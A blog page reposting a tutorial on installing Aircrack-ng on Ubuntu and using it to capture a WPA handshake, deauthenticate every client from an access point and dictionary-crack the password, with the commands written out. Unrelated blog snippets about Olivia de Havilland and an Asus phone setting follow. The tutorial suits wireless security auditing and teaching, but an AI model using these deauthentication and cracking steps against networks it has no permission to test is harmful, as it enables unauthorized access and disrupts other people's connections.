Skip to main content

Install Aircrack-ng on Ubuntu linux OS





Install Aircrack-ng on Ubuntu


Aircrack-ng is a whole suite of tools for Wireless Security Auditing. It can be used to monitor, test, crack or attack Wireless Security Protocols like WEP, WPA, WPA2. Aircrack-ng is command line based and is available for Windows and Mac OS and other Unix based Operating systems. Aircrack-ng suite contains a lot of tools used for various purposes but here we’ll only look at some important tools that are used more often in Wireless Security testing.
Airmon-ng
Airmon-ng is used to manage wireless card modes and to kill unnecessary processes while using aircrack-ng. To sniff a wireless connection, you need to change your wireless card from managed mode to monitor mode and airmon-ng is used for that purpose.
Airodump-ng
Airodump-ng is a wireless sniffer that can capture wireless data from one or more wireless Access Points. It is used to analyze nearby Access Points and to capture handshakes.
Aireplay-ng
Aireplay-ng is used for replay attacks and as packet injector. It can be de-authenticate users from their APs to capture handshakes.
Airdecap-ng
Airdecap-ng is used to decrypt encrypted WEP, WPA/WPA2 wireless packets with known key.
Aircrack-ng
Aircrack-ng is used to attack WPA/WEP wireless protocols in order to find the key.

Installation

Aircrack-ng is easy to install in Ubuntu using APT. Just type the following command and this will install all tools available in Aircrack-ng suite.
sudo apt-get update
sudo apt-get install -y aircrack-ng

Usage

In this article, we’ll take a quick look at how to use aircrack-ng to crack an encrypted wireless network (TR1CKST3R in this example) to find the password.
First of all, list out all available wireless cards connected to your PC using ‘iwconfig’ command.
We’ll use ‘wlxc83a35cb4546’ named wireless card for this tutorial (This might be different in your case). Now, kill all the processes running on wireless card using airmon-ng.
ubuntu@ubuntu:~$ sudo airmon-ng check kill
Start Monitor mode on ‘wlxc83a35cb4546’ by typing
ubuntu@ubuntu:~$ sudo airmon-ng start wlxc83a35cb4546
Now, airmon-ng has started Monitor mode on wireless card, it’ll appear as different name ‘wlan0mon’. Run ‘iwconfig’ again to list wireless details.
Then, use airodump-ng to see nearby Wireless Access Points and their properties.
ubuntu@ubuntu:~$ sudo airodump-ng wlan0mon
You can narrow down search using MAC (–bssid) and channel (-c) filters. To capture handshake (Handshake contains encrypted password), we need to save our packets somewhere using “–write” option. Type,
ubuntu@ubuntu:~$ sudo airodump-ng --bssid 6C:B7:49:FC:62:E4
 -c 11 wlan0mon --write /tmp/handshake.cap

--bssid : Access Point’s MAC Address

-c : Access Point’s channel [1-13]

--write : Stores captured packets at a defined location
Now, we need to de-authenticate every device from this Access Point using Aireplay-ng utility. Write
ubuntu@ubuntu:~$ sudo aireplay-ng -0 100 -a [MAC_ADD] wlan0mon
-a : Specify Access Points MAC for Aireplay-ng
-0 : Specify number of deauth packets to send
After a while, all devices will be disconnected from that Access Point, when they’ll try to reconnect, running airodump-ng will capture the handshake. It’ll appear at the top of running airodump-ng.
Handshake is stored in ‘/tmp/’ directory, and contains encrypted password that can be brute forced offline using a dictionary. To crack the password, we’ll be using Aircrack-ng. Type
ubuntu@ubuntu:~$ sudo aircrack-ng /tmp/handshake.cap-01.cap -w
/usr/share/wordlists/rockyou.txt
-w : Specify the dictionary location
Aircrack-ng will go through the list of passwords, and if found, it’ll display the password used as key.
In this case, aircrack-ng found the password used ‘123456789’.
Now, stop Monitor mode on wireless card and restart the network-manager.
ubuntu@ubuntu:~$ sudo airmon-ng stop wlan0mon
ubuntu@ubuntu:~$ sudo service network-manager restart

Conclusion

Aircrack-ng can be used to audit Wireless Security or to crack forgotten passwords. There are some other similar tools available for this purpose like Kismet but aircrack-ng is better known for good support, versatility and having wide range of tools. 


                                                                                             source:https://linuxhint.com/install_aircrack-ng_ubuntu/

Comments

Popular posts from this blog

On and off screen, Olivia de Havilland exhibited grit and grace

On screen and off, Olivia de Havilland embodied grit and grace. (Photo by Hulton Archive/Getty Images) (CNN) Olivia de Havilland  represented a throwback to a bygone era, one of the last vestiges of Hollywood during its glamorous golden age. On screen, her characters held their own opposite Scarlett O'Hara and Robin Hood, appearing in black and white and florid color. Although she was a beautiful, often demure personality in movies, de Havilland exhibited a grit offscreen that might have helped explain her longevity, dying decades after many of her co-stars, at the age of 104. As if to punctuate that point, the actress sued the FX network production of  "Feud: Bette and Joan,"  a series devoted to Bette Davis and Joan Crawford, for its depiction of her as a supporting player, making clear that even as a centenarian, she was not someone with which to trifle. Olivia de Havilland, star of 'Gone With the Wind,' dies at 104 De Havilland, famously, had gone to court to ...

Asus ROG Phone 3 Has a Hidden 160Hz Refresh Rate Option: Report Asus has confirmed the 160Hz display mode but says it is only for internal testing purposes.

Asus ROG Phone 3 has a secret 160Hz refresh rate that can be unlocked using the Android Debug Bridge (ADB) command-line tool. Launched in India last week, the flagship gaming phone comes with a refresh rate of 144Hz on paper. The Taiwanese tech giant has also confirmed the existence of the advanced refresh rate option, which it says is only meant for internal testing and not for end-users. The phone's display, however, has not been calibrated to suit a refresh rate of 160Hz. XDA Developers  found the hidden  160Hz refresh option, sharing steps on how to unlock it. It says that the mode can only be activated by using the ADB PC app. Once there, the user needs to you run a command from a prompt or terminal window, “adb shell setprop debug.vendor.asus.fps.eng 1.” Following this, when the phone is rebooted, the 160Hz refresh rate option should start appearing in the display settings. Asus ROG Phone 3 Specifications The  Asus ROG Phone 3  sports a 6.59-inch full-HD+ AMOLE...